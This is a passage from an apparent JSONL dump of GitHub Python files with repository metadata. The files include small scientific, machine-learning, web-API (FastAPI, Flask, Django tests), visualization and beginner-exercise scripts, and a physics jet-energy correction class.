fo.close()\n fo = open(\"all_y_%s\" % (pout), \"w\")\n for key in predictions.keys():\n fo.write(\"%s,\" % (key))\n for i in range(len(predictions[key])-1):\n fo.write(\"%.4f,\" % (predictions[key][i]))\n fo.write(\"%.4f\\n\" % (predictions[key][-1]))\n fo.close()\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument('--smiles',\n default=None,\n type=str,\n help='Smiles molecules')\n p.add_argument('--desc_csv',\n default=None,\n type=str,\n help='Molecule descriptors')\n p.add_argument('--minp',\n default=None,\n type=str,\n help='model input')\n p.add_argument('--pout',\n default=None,\n type=str,\n help='Prediction output')\n args = p.parse_args(sys.argv[1:])\n\n if args.pout is None or args.db is None or args.minp is None:\n print(\"\\nUsage:\")\n print(\"--smiles [Smiles molecules]\")\n print(\"--desc_csv [Molecular descriptors file]\")\n print(\"--minp [keras model out]\")\n print(\"--pout [default None]\")\n print(\"\\nUsage model prediction example: python %s --smiles dataset.smi --desc_csv rdkit.desc.csv --minp model --out output.csv\\n\" % (sys.argv[0]))\n else:\n mp = ModelPredictor(args.minp,\n args.desc_csv)\n mp.predict(args.pout)\n return 0\n\n\nif __name__ in \"__main__\":\n main()\n","repo_name":"gmrandazzo/DeepMolecularNetwork","sub_path":"deepmolecularnetwork/OneHotEncodingModeling/makeOHEPrediction.py","file_name":"makeOHEPrediction.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14022830600","text":"from model_mommy import mommy\nfrom rest_framework.reverse import reverse\nfrom rest_framework.test import APITestCase\n\n\nclass AppFilterTest(APITestCase):\n\n def setUp(self):\n self.superuser = mommy.make(\n \"api.User\", is_superuser=True)\n self.normal_user = mommy.make(\n \"api.User\", is_superuser=False)\n\n self.app_1 = mommy.make(\n \"api.App\", name=\"App 1\")\n self.app_2 = mommy.make(\n \"api.App\", name=\"App 2\")\n\n def test_everyone_see_everything(self):\n for user in [self.superuser, self.normal_user]:\n self.client.force_login(user)\n\n response = self.client.get(reverse(\"app-list\"))\n app_ids = [app[\"id\"] for app in response.data[\"results\"]]\n self.assertEqual(len(app_ids), 2)\n self.assertIn(self.app_1.id, app_ids)\n self.assertIn(self.app_2.id, app_ids)\n","repo_name":"lahkurb/analytics-platform-control-panel","sub_path":"tests/api/filters/test_app_filter.py","file_name":"test_app_filter.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23234905076","text":"import sys\nimport yaml\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\nclass MainWindow(object):\n def setup_ui(self, form):\n form.setObjectName(\"Main Window\")\n form.resize(752, 568)\n self.widget = QtWidgets.QWidget(form)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n form = QtWidgets.QWidget()\n ui = MainWindow()\n ui.setup_ui(form)\n form.show()\n sys.exit(app.exec_())","repo_name":"refrshrs/CharGen","sub_path":"_archive/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11079922008","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': 'Kleines MauMau-Spiel',\n 'author': 'Frederik',\n 'url': '',\n 'download_url': '',\n 'author_email': 'code@padjen.de',\n 'version': '0.0.1',\n 'install_requires': ['nose'],\n 'packages': ['maumau'],\n 'scripts': [],\n 'name': 'maumau'\n}\n\nsetup(**config)\n","repo_name":"fpadjen/MauMau","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29689398675","text":"from setuptools import setup, find_packages\nimport re\n\n\nversion = ''\nwith open('aioEasyPillow/__init__.py') as f:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]', f.read(), re.MULTILINE).group(1)\n\nreadme = ''\nwith open('README.md') as f:\n readme = f.read()\n\nrequirements = []\nwith open(\"requirements.txt\") as f:\n requirements = f.read().splitlines()\n\n\nsetup(\n name='aioEasyPillow',\n version=version,\n description='Async working easy to use Pillow Library.',\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author='Guddi',\n url='https://github.com/Guddi8/aioEasyPillow',\n project_urls={\n \"Documentation\": \"https://aioeasypillow.readthedocs.io/en/latest/\",\n },\n packages=find_packages(),\n license='MIT',\n keywords=[\n 'PIL', 'Pillow', 'async PIL', 'async Pillow', 'Easy PIL', 'Easy Pillow',\n 'discord images', 'discord card', 'discord rank card'\n ],\n install_requires=requirements,\n python_requires=\">=3.8, <4\",\n include_package_data=True,\n package_data={\n \"aioEasyPillow\": [\"fonts/*/*.ttf\"],\n },\n)","repo_name":"Guddi8/aioEasyPillow","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"42870904305","text":"def verifica_lista(l):\n im = True\n p = True\n if len(l) == 0:\n return 'misturado'\n for i in range(len(l)):\n if l[i]%2 != 0:\n p = False \n elif l[i]%2 == 0:\n im = False\n if im and not p:\n return 'ímpar'\n elif p and not im:\n return 'par'\n else:\n return 'misturado' \n","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_267/ch162_2020_06_12_21_22_41_582853.py","file_name":"ch162_2020_06_12_21_22_41_582853.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10387319643","text":"import skimage.io as io\nimport skimage.util.noise as noise\nimport scipy.ndimage as ndi\nimport matplotlib.pyplot as plt\nfrom scipy.signal import wiener\n\nimg01= io.imread('C://Users//kamel//Music//misc//4.2.07.tiff')\n\nplt.subplot(2,2,1)\nplt.title('Original')\nio.imshow(img01)\n\nimg02= noise.random_noise(img01,'gaussian',mean=0,var=0.01)\n\nplt.subplot(2,2,2)\nplt.title('Noisy')\nio.imshow(img02)\n\nimg03= ndi.uniform_filter(img02,2)\nplt.subplot(2,2,3)\nplt.title('Average filtered')\nio.imshow(img03)\n\nimg03= wiener(img02,[3,3,3])\nplt.subplot(2,2,4)\nplt.title('Wiener filtered')\nio.imshow(img03)\n\nplt.show()\n","repo_name":"KameliaZaman/DIP-Lab","sub_path":"RnD/Alasdair/task13.10.py","file_name":"task13.10.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"497717738","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nfrom scipy.special import rel_entr as kl\nfrom multiprocessing import Pool, cpu_count\n\nfrom .junction_tree import junction_tree\nfrom .nodes import parents as _parents\nfrom ..structures import DirectedGraph, BayesianNetwork, ConditionalProbabilityTable\n\nif TYPE_CHECKING:\n from typing import Dict, List\n from ..structures import Dataset\n\n\ndef expectation_maximization(\n dag: DirectedGraph,\n dataset: Dataset,\n max_iter: int = 50,\n tol: float = 1e-08\n) -> BayesianNetwork:\n # If DAG is string, build BayesianNetwork\n if isinstance(dag, str):\n dag = BayesianNetwork.from_structure(dag)\n if isinstance(dag, DirectedGraph):\n dag = BayesianNetwork(\n nodes=dag.nodes(),\n adjacency_matrix=dag.adjacency_matrix()\n )\n # Get nodes from dag\n nodes = dag.nodes()\n # Get variables levels from dataset\n levels = dataset.levels()\n # Cache parents for each node\n parents = {\n node: _parents(dag, node)\n for node in nodes\n }\n # Create zeroed CPTs for each variable\n zeros = _build_empty_cpts(nodes, levels, parents)\n # Initialize CPTs of each node\n # using a uniform distribution\n for node in nodes:\n dag[node]['CPT'] = zeros[node] + (1 / len(levels[node]))\n # Count absolute frequencies of unique\n # variables configurations in dataset\n # and transform in list of dicts by row\n dataset = dataset.absolute_frequencies()\n dataset = dataset.reset_index().to_dict('records')\n # Repeat until convergence or max iterations reached\n iteration = 0\n converged = False\n while not converged and iteration < max_iter:\n ### Expectation Step ###\n\n # Compute the Junction Tree for exact inference\n jt = junction_tree(dag)\n # Initialize list of parameters\n frequencies = [\n (node, parents[node], dataset, zeros[node].copy(), jt)\n for node in nodes\n ]\n # For each node, for each row compute absolute\n # frequencies counting from dataset and using\n # joint queries when NAN values are present\n pool = Pool(cpu_count())\n frequencies = pool.starmap(_expectation_maximization_node, frequencies)\n pool.close()\n pool.join()\n\n ### Maximization Step ###\n\n # For each node compute CPT\n frequencies = {\n nodes[i]: freq / freq.sum(axis=0)\n for i, freq in enumerate(frequencies)\n }\n\n ### Check stopping criteria ###\n converged = _has_converged(dag, frequencies, tol)\n iteration += 1\n\n # Update CPT in DAG\n dag.set_cpts(frequencies)\n return dag\n\n\ndef _expectation_maximization_node(node, parents, dataset, counter, jt):\n for row in dataset:\n # Init query\n query = 1\n # Select variables\n variables = [node] + parents\n # Select variables values\n values = {\n k: v for k, v in row.items()\n if k in variables\n }\n # Check if there are NAN values\n any_nan = any([pd.isnull(v) for _, v in values.items()])\n if (any_nan):\n # Set evidence\n evidence = _build_evidence(row, variables)\n jte = jt.set_evidence(**evidence)\n # Execute query\n query = jte.query('joint', variables)[0]\n # Update values\n counter.loc[values] += query * row['count']\n return counter\n\n\ndef _build_empty_cpts(nodes: List, levels: Dict, parents: Dict):\n cpts = {}\n for node in nodes:\n dim = [node] + parents[node]\n lvs = [levels[d] for d in dim]\n dat = np.zeros([len(l) for l in lvs])\n cpts[node] = ConditionalProbabilityTable(\n data=dat,\n dims=dim,\n coords=lvs\n )\n return cpts\n\n\ndef _build_evidence(row: Dict, variables: List):\n return {\n k: v for k, v in row.items()\n if k not in variables\n and k != 'count'\n and not pd.isnull(v)\n }\n\n\ndef _has_converged(dag: BayesianNetwork, frequencies: Dict, tol: float):\n return all([\n np.sum(kl(dag[node]['CPT'].values, cpt.values)) < tol\n for node, cpt in frequencies.items()\n ])\n","repo_name":"madlabunimib/MADBayes","sub_path":"madbayes/algorithms/expectation_maximization.py","file_name":"expectation_maximization.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"25308601778","text":"#!/bin/env python3\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict, Counter\n\nimport vtk\n# each color to specific square\nfrom vtk.util.colors import red, orange, yellow\nfrom vtk.util.colors import purple, blue, green\nfrom vtk.util.colors import white, magenta, green_dark\nfrom vtk.util.colors import grey, light_grey, pink\n\ndf = pd.read_csv(\"../data/fingerprinting.csv\", index_col=\"Unnamed: 0\")\nf = df.Square.apply(lambda x: int(x[1:]))\n\nfunc = defaultdict(list)\nfor i, val in zip(df[[\"Server-RSSI-1\", \"Server-RSSI-2\", \"Server-RSSI-3\"]].to_numpy(), f):\n func[tuple(i)].append(val)\n\nunique_func = dict()\nfor i, val in func.items():\n unique_func[i] = max(Counter(val).items(), key=lambda x: x[1])[0]\n\n# create bins for space\n# [-95; -20] - range, that RSSI can be measured\nnx = ny = nz = 75\nnumPoints = nx * ny * nz\n\nmn_x = df[\"Server-RSSI-1\"].min()\nmx_x = df[\"Server-RSSI-1\"].max()\nxs = np.linspace(-20, -95, nx)\n\nmn_y = df[\"Server-RSSI-2\"].min()\nmx_y = df[\"Server-RSSI-2\"].max()\nys = np.linspace(-20, -95, nx)\n\nmn_z = df[\"Server-RSSI-3\"].min()\nmx_z = df[\"Server-RSSI-3\"].max()\nzs = np.linspace(-20, -95, nz)\nzz, yy, xx = np.meshgrid(zs, ys, xs, indexing='ij')\nxyz = np.zeros((numPoints, 3), np.float64)\nxyz[:, 0] = xx.flat\nxyz[:, 1] = yy.flat\nxyz[:, 2] = zz.flat\n\n# create the pipeline\ncoords = vtk.vtkDoubleArray()\npts = vtk.vtkPoints()\ngrid = vtk.vtkStructuredGrid()\nitems = vtk.vtkAppendPolyData()\nmapper = vtk.vtkPolyDataMapper()\nactor = vtk.vtkActor()\ndomainMapper = vtk.vtkDataSetMapper()\ndomainActor = vtk.vtkActor()\n\n\n# colors\ndef get_color(r, g, b):\n clrs = vtk.vtkUnsignedCharArray()\n clrs.SetNumberOfComponents(3)\n clrs.SetName(\"Colors\")\n clrs.SetNumberOfTuples(0)\n for i in range(1024):\n clrs.InsertNextTypedTuple((r, g, b))\n return clrs\n\n\ncolors = [[int(gr * 255) for gr in c] for c in\n [red, orange, yellow, purple, blue, green, white, magenta, green_dark, grey, light_grey, pink]]\n\n# make each point a sphere with small radius\nfor i, val in unique_func.items():\n dotSource = vtk.vtkSphereSource()\n dotSource.SetThetaResolution(5)\n dotSource.SetPhiResolution(5)\n dotSource.SetRadius(0.3)\n dotSource.SetCenter(*i)\n\n sp = dotSource.GetOutput()\n dotSource.Update()\n sp.GetCellData().SetScalars(get_color(*colors[val]))\n\n items.AddInputConnection(dotSource.GetOutputPort())\n\n# settings\ndomainMapper.SetScalarVisibility(0)\ndomainActor.GetProperty().SetOpacity(0.3)\n\n# construct the grid\ngrid.SetDimensions(nx, ny, nz)\ncoords.SetNumberOfComponents(3)\ncoords.SetNumberOfTuples(numPoints)\ncoords.SetVoidArray(xyz, 3 * numPoints, 1)\n\n# connect\npts.SetNumberOfPoints(numPoints)\npts.SetData(coords)\ngrid.SetPoints(pts)\nmapper.SetInputConnection(items.GetOutputPort())\nmapper.SetColorModeToDirectScalars()\nactor.SetMapper(mapper)\ndomainMapper.SetInputData(grid)\ndomainActor.SetMapper(domainMapper)\n\n# show\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# add the actors to the renderer, set the background and size\nren.AddActor(actor)\nren.AddActor(domainActor)\nren.SetBackground(0.0, 0.0, 0.0)\nren.SetUseDepthPeeling(1)\nren.SetOcclusionRatio(0.1)\nren.SetMaximumNumberOfPeels(100)\nrenWin.SetSize(400, 300)\nrenWin.SetMultiSamples(0)\nrenWin.SetAlphaBitPlanes(1)\niren.Initialize()\nrenWin.Render()\niren.Start()\n","repo_name":"Midren/Localization","sub_path":"scripts/fingerprinting_visualization.py","file_name":"fingerprinting_visualization.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24417778603","text":"from app import app\r\nfrom modelos import *\r\nfrom flask import render_template\r\n\r\n@app.route('/')\r\ndef login():\r\n form = LoginForm()\r\n return render_template('index.html', title='Sign In', form=form)\r\n\r\n\r\n\r\n\r\n@app.route('/consulta')\r\ndef index():\r\n #listas\r\n personas=Personas.query.order_by(Personas.ID).all()\r\n print(personas)\r\n return render_template('Consulta.html', persona=personas)\r\n","repo_name":"Sot0823/Proyecto-Flask-DB2","sub_path":"controlador.py","file_name":"controlador.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71572582452","text":"#find odd frequency charecters in string\r\n# it smells like count() method, counter( ) method\r\n\r\n\r\n#attempt 1\r\n#try with count()method\r\n# i think its simple make the given string a set then pair a loop and count() with it\r\n\r\ntest_str=\"geeks for geeks \"\r\nx=set(test_str)\r\nres=[]\r\nfor i in x:\r\n if test_str.count(i)%2!=0:\r\n res.append(i)\r\nprint(\"the odd frequency charecters are:\",res)\r\n\r\n\r\n#attempt 2\r\n#try eith list comprehension()+.counter()\r\n#look closely\r\nfrom collections import Counter\r\ntest_str='geeksforgeeks is best for geeks '\r\nprint(\"the original string is :\", test_str)\r\nres=[ chr for chr ,count in counter(test_str).items() if count & 1]\r\nprint(\"the odd frequency charecters are :\",str(res))\r\n\r\n\r\n\r\n ","repo_name":"hackerbotsupreme/python-coding-job","sub_path":"string/problem11.py","file_name":"problem11.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3500139710","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\ndef abline(slope, intercept):\n x = np.array(plt.gca().get_xlim())\n y = slope * x + intercept\n plt.plot(x, y, '--')\n\ndef plot_points(data, inliers):\n categories = data[:, 2].astype(np.uint8)\n unique_cats = np.unique(categories)\n for c in unique_cats:\n data[categories == c]\n plt.scatter(data[categories == c, 0], data[categories == c, 1], label=\"noise\" if c == 0 else \"linear\")\n\ndef show(csv_path: str, slope: float, intercept: float, error: float):\n data = np.loadtxt(csv_path, delimiter=\",\")\n inliers = np.loadtxt(\"inliers.txt\", np.int)\n\n # only use a subset for plotting\n max_datapoints = 1000\n if len(data) > max_datapoints:\n data = data[::(len(data) // max_datapoints)]\n\n plot_points(data, inliers)\n abline(slope, intercept)\n plt.title(f\"Slope: {slope:.4}, Intercept: {intercept:.4}, Error: {error:.4}\")\n plt.legend()\n plt.show()\n\n plt.savefig(\"vis.jpg\")\n\nif __name__ == \"__main__\":\n with open(\"results.txt\", \"r\") as f:\n model = [float(s) for s in f.readline().split(\" \")]\n show(\"points.csv\", *model)\n","repo_name":"cyd3r/ransac","sub_path":"util/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"285054317","text":"#\r\n# print(\"Let's find whether the number is Armstrong number or not. \\n\\n\\n\")\r\n# print(\"\\n Enter the number\")\r\n# num = int(input())\r\n# num = str(num)\r\n# num_ls = list(num)\r\n# count = len(num_ls)\r\n# sum = 0\r\n# for i in range(count):\r\n# sum += pow(int(num_ls[i]),count)\r\n# print(sum)\r\n# if sum == int(num):\r\n# print(\"\\n The entered number is Armstrong\")\r\n\r\nprint(\"\\n********************************************************************\\n\")\r\nprint(\"\\n Lets display armstrong numbers from the given range\")\r\nfirst = int(input(\"\\n Enter the first number for the range : \"))\r\nlast = int(input(\"\\n Enter the last number for the range : \"))\r\nprint(\"\\n Below are Armstrong numbers between \",first, \" and \",last)\r\nfor i in range(first,last+1):\r\n num = str(i)\r\n num_l = list(num)\r\n count = len(num_l)\r\n sum = 0\r\n for j in range(count):\r\n sum += pow(int(num_l[j]),count)\r\n if sum == int(num):\r\n print(sum)\r\n print(\"\")","repo_name":"Rahul26795/Python-Programs-1","sub_path":"Amstrong_num.py","file_name":"Amstrong_num.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41006707497","text":"# -*- coding:utf-8 -*-\n\n\n# 2進数、8進数、10進数の回文数を求める処理\ndef main():\n # 11から探索開始\n x = 11\n\n while True:\n # 型もチェックするので、合わせる\n # format()はint型でないとエラーになる\n # format(b)はbinary(2進数)、format(o)はoctal(8進数)\n # str()にしたあとに[::-1]をすると文字列が逆に並ぶ(すごい)\n if str(x) == str(x)[::-1] \\\n and str(format(x, 'b')) == str(format(x, 'b'))[::-1] \\\n and str(format(x, 'o')) == str(format(x, 'o'))[::-1]:\n print(x)\n break\n\n # python3からこの表記はおkになった?\n x += 2\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"aipacommander/q-programming-math","sub_path":"q01.py","file_name":"q01.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13443921085","text":"import logging.config\nimport os\nimport re\nfrom http import HTTPStatus\nfrom pathlib import Path\n\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi_utils.openapi import simplify_operation_ids\nfrom starlette.responses import FileResponse, RedirectResponse\n\nfrom app.api.api_v1.api import router\nfrom app.core.config import get_settings\nfrom app.core.redis_client import redis\nfrom app.data.cache import cached_data\nfrom app.docs.api_docs.swagger_ui import get_api_docs_for_swagger_ui, get_swagger_ui_html\n\nAPP_FOLDER = Path(__file__).parent\nSTATIC_FOLDER = APP_FOLDER.joinpath(\"static\")\nRATE_LIMIT_ROUTE_REGEX = re.compile(r\"^\\/v1\\/blocks|characters|planes\")\n\n\napp = FastAPI(\n title=get_settings().PROJECT_NAME,\n description=get_api_docs_for_swagger_ui(),\n version=get_settings().API_VERSION,\n openapi_url=f\"{get_settings().API_VERSION}/openapi.json\",\n docs_url=None,\n redoc_url=None,\n)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\n \"http://localhost:3500\",\n \"http://10.0.1.74:3500\",\n \"https://base64.aaronluna.dev\",\n \"http://172.17.0.1\",\n ],\n allow_credentials=True,\n allow_methods=[\"GET\", \"OPTIONS\"],\n allow_headers=[\"X-UnicodeAPI-Test\"],\n)\napp.mount(\"/static\", StaticFiles(directory=str(STATIC_FOLDER)), name=\"static\")\n\n\n@app.on_event(\"startup\")\ndef init_unicode_obj():\n _ = cached_data.non_unihan_character_name_map\n _ = cached_data.blocks\n _ = cached_data.planes\n _ = cached_data.all_unicode_versions\n\n\n@app.on_event(\"startup\")\ndef init_redis_client():\n settings = get_settings()\n logging.config.dictConfig(settings.LOGGING_CONFIG)\n _ = redis.get_redis_client()\n\n\n@app.middleware(\"http\")\nasync def apply_rate_limiting(request: Request, call_next):\n if testing(request) or not RATE_LIMIT_ROUTE_REGEX.search(request.url.path) or not request.client:\n return await call_next(request)\n result = redis.is_request_allowed_by_rate_limit(request.client.host)\n if result.success:\n return await call_next(request)\n return JSONResponse(content=result.error, status_code=int(HTTPStatus.TOO_MANY_REQUESTS))\n\n\ndef testing(request: Request) -> bool:\n test_header = os.environ.get(\"TEST_HEADER\", \"\").lower()\n return (\n test_header in request.headers or test_header in request.headers.get(\"access-control-request-headers\", [])\n if test_header\n else False\n )\n\n\n@app.get(f\"{get_settings().API_VERSION}/docs\", include_in_schema=False, response_class=FileResponse)\nasync def swagger_ui_html():\n settings = get_settings()\n return get_swagger_ui_html(\n openapi_url=app.openapi_url or \"/openapi.json\",\n title=f\"{settings.PROJECT_NAME} Docs - Swagger UI\",\n swagger_js_url=\"/static/swagger-ui-bundle.js\",\n swagger_css_url=\"/static/swagger-ui.css\",\n swagger_favicon_url=\"/static/favicon.png\",\n swagger_ui_parameters={\n \"docExpansion\": \"list\",\n \"defaultModelsExpandDepth\": -1,\n \"useUnsafeMarkdown\": True,\n \"syntaxHighlight.theme\": \"arta\",\n \"tryItOutEnabled\": \"true\",\n \"displayRequestDuration\": \"true\",\n \"requestSnippetsEnabled\": \"true\",\n \"requestSnippets\": {\n \"generators\": {\n \"curl_bash\": {\"title\": \"cURL (bash)\", \"syntax\": \"bash\"},\n },\n \"defaultExpanded\": False,\n \"languages\": None,\n },\n },\n custom_js_url=\"/static/custom.js\",\n )\n\n\n@app.get(\"/\", include_in_schema=False)\ndef get_api_root():\n return RedirectResponse(\n url=app.url_path_for(\"swagger_ui_html\"),\n status_code=int(HTTPStatus.PERMANENT_REDIRECT),\n )\n\n\napp.include_router(router, prefix=get_settings().API_VERSION)\nsimplify_operation_ids(app)\n","repo_name":"a-luna/unicode-api","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2953335347","text":"from typing import Type\nfrom fastapi.datastructures import Default\nfrom mongoengine import *\nimport datetime\n\nfrom mongoengine.document import Document, EmbeddedDocument\nfrom mongoengine.fields import *\n# from mongoengine import connect, Document, ReferenceField, CASCADEs\n\nclass Module(Document):\n \n ServiceId = StringField()\n ParentContainerId = ListField(StringField())\n UsecaseParameter = DictField(default = None)\n ScheduleRuntime = StringField()\n TSCreated = DateTimeField(default=datetime.datetime.utcnow())\n TSModified = DateTimeField()\n\nclass ModuleMapping(EmbeddedDocument):\n ScheduledModules = ListField(ReferenceField(Module))\n UncheduledModules = ListField(ReferenceField(Module))\n\nclass Camera(Document):\n CameraId = StringField()\n CameraName = StringField()\n Location = StringField()\n Username = StringField()\n Password = StringField()\n Link = StringField()\n CameraSource = StringField()\n CameraStatus = BooleanField()\n AddedBy = StringField(default=None)\n RefImage = ListField()\n Modules = EmbeddedDocumentField(ModuleMapping)\n TSCreated = DateTimeField(default=datetime.datetime.utcnow)\n TSModified = DateTimeField()\n\n\nclass ScheduleFlag(Document):\n Status = StringField()\n\nclass CameraSource(Document):\n SourceName = StringField()\n\nclass CameraHealthCheck(Document):\n HealthCheck = BooleanField()\n HealthCheckInterval = IntField()\n GetAlert = BooleanField()\n UserConsent = BooleanField()\n\nclass Taskmeta(Document):\n TaskName = StringField()\n TaskTime = DateTimeField()\n Status = StringField()\n Traceback = StringField()\n\nclass ServiceSchedule(Document):\n ScheduleUsecases = ListField()\n SchedulesAIModels = ListField()\n UnscheduleUsecases = ListField()\n UnscheduleAIModels = ListField()\n\nclass ServiceCameraMapping(Document):\n ServiceId = StringField()\n ScheduleCameraIds = ListField()\n UnscheduleCameraIds = ListField() \n\nclass ScheduleRunTime(Document):\n OpenTime = StringField()\n CloseTime = StringField()\n HolidaysList = ListField(DateTimeField)\n\nclass ReferenceImage(Document):\n CameraId = ReferenceField(Camera)\n ImageType = StringField()\n ImageType = StringField()\n TSCreated = DateTimeField()\n TSModified = DateTimeField()\n\n\n\n\n\n\n\n\n\n","repo_name":"shrush09/RDXCamServices","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73735821493","text":"import re\nfrom functools import reduce\n\nimport awkward\nimport dask_awkward\nimport numpy\n\nfrom coffea.lookup_tools.jme_standard_function import jme_standard_function\n\n\ndef _checkConsistency(against, tocheck):\n if against is None:\n against = tocheck\n else:\n if against != tocheck:\n raise Exception(\n \"Corrector for {} is mixed\"\n \"with correctors for {}!\".format(tocheck, against)\n )\n return tocheck\n\n\n_levelre = re.compile(\"[L1-7]+\")\n\n\ndef _getLevel(levelName):\n matches = _levelre.findall(levelName)\n if len(matches) > 1:\n raise Exception(f\"Malformed JEC level name: {levelName}\")\n return matches[0]\n\n\n_level_order = [\"L1\", \"L2\", \"L3\", \"L2L3\", \"L4\", \"L5\", \"L6\", \"L7\"]\n\n\ndef _sorting_key(name_and_func):\n this_level = _getLevel(name_and_func[0])\n return _level_order.index(this_level)\n\n\nclass _getCorrectionFn:\n def __init__(self, jec, **kwargs):\n self.jec = jec\n self.kwarg_keys = list(kwargs.keys())\n\n def __call__(self, *args):\n kwargs = {k: v for k, v in zip(self.kwarg_keys, args)}\n corrs = self.jec.getSubCorrections(**kwargs)\n return reduce(lambda x, y: y * x, corrs, 1.0)\n\n\nclass FactorizedJetCorrector:\n \"\"\"\n This class is a columnar implementation of the FactorizedJetCorrector tool in\n CMSSW and FWLite. It applies a series of JECs in ascending order as defined by\n '_level_order', and checks for the consistency of input corrections.\n\n It implements the jet energy correction definition specified in the JEC TWiki_.\n\n .. _TWiki: https://twiki.cern.ch/twiki/bin/view/CMS/JetEnergyScale\n\n You can use this class as follows::\n\n fjc = FactorizedJetCorrector(name1=corrL1,...)\n jetCorrs = fjc(JetParameter1=jet.parameter1,...)\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n You construct a FactorizedJetCorrector by passing in a dict of names and functions.\n Names must be formatted as '____'.\n \"\"\"\n jettype = None\n levels = []\n funcs = []\n datatype = None\n campaign = None\n dataera = None\n for name, func in kwargs.items():\n if not isinstance(func, jme_standard_function):\n raise Exception(\n \"{} is a {} and not a jme_standard_function!\".format(\n name, type(func)\n )\n )\n info = name.split(\"_\")\n if len(info) > 6 or len(info) < 5:\n raise Exception(\"Corrector name is not properly formatted!\")\n offset = len(info) - 5\n\n campaign = _checkConsistency(campaign, info[0])\n dataera = _checkConsistency(dataera, info[1])\n datatype = _checkConsistency(datatype, info[2 + offset])\n levels.append(info[3 + offset])\n funcs.append(func)\n jettype = _checkConsistency(jettype, info[4 + offset])\n\n if campaign is None:\n raise Exception(\"Unable to determine production campaign of JECs!\")\n else:\n self._campaign = campaign\n\n if dataera is None:\n raise Exception(\"Unable to determine data era of JECs!\")\n else:\n self._dataera = dataera\n\n if datatype is None:\n raise Exception(\"Unable to determine if JECs are for MC or Data!\")\n else:\n self._datatype = datatype\n\n if len(levels) == 0:\n raise Exception(\"No levels provided?\")\n else:\n self._levels = levels\n self._funcs = funcs\n\n if jettype is None:\n raise Exception(\"Unable to determine type of jet to correct!\")\n else:\n self._jettype = jettype\n\n temp = list(zip(*sorted(zip(self._levels, self._funcs), key=_sorting_key)))\n self._levels = list(temp[0])\n self._funcs = list(temp[1])\n\n # now we setup the call signature for this factorized JEC\n self._signature = []\n for func in self._funcs:\n sig = func.signature\n for input in sig:\n if input not in self._signature:\n self._signature.append(input)\n\n @property\n def signature(self):\n \"\"\"list the necessary jet properties that must be input to this function\"\"\"\n return self._signature\n\n def __repr__(self):\n out = \"campaign : %s\\n\" % (self._campaign)\n out += \"data era : %s\\n\" % (self._dataera)\n out += \"data type : %s\\n\" % (self._datatype)\n out += \"jet type : %s\\n\" % (self._jettype)\n out += \"levels : %s\\n\" % (\",\".join(self._levels))\n out += \"signature : (%s)\\n\" % (\",\".join(self._signature))\n return out\n\n def getCorrection(self, **kwargs):\n \"\"\"\n Returns the set of corrections for all input jets at the highest available level\n\n Use it like::\n\n jecs = 